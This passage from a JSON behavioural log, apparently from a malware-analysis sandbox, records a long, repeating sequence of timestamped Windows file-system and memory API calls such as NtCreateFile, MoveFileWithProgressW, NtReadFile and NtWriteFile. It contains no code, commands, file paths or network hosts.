{"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,834", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:49,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:49,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,904", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,904", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,914", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,914", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:49,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:50,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:50,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,074", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,104", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,104", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:50,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,134", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,164", "api": 
